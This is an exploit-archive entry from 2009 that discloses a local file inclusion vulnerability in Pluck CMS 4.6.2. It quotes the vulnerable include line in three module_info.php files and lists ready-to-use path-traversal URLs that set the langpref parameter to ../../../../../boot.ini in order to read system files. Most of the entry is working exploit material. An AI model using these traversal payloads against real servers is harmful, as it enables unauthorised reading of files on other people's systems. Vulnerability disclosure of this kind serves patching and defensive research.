[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Pluck 4.6.2 (langpref) Local File Inclusion Vulnerabilities
# Published : 2009-05-18
# Author : ahmadbady
# Previous Title : Flyspeck CMS 6.8 Remote LFI / Change Add Admin Exploit
# Next Title : ClanWeb 1.4.2 Remote Change Password / Add Admin Exploit


=-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::pluck version 4.6.2
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.pluck-cms.org/?file=kop2.php

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
vul:/data/modules/contactform/module_info.php

include ("data/inc/lang/$langpref"); line 13
--
vul:/data/modules/blog/module_info.php
include ("data/inc/lang/$langpref"); line 13
--
vyl:/data/modules/albums/module_info.php
include ("data/inc/lang/$langpref"); line 13
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=
xpl:
path/data/modules/contactform/module_info.php?langpref=../../../../../boot.ini
path/data/modules/blog/module_info.php?langpref=../../../../../boot.ini
path/data/modules/albums/module_info.php?langpref=../../../../../boot.ini
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=

# www.Syue.com [2009-05-18]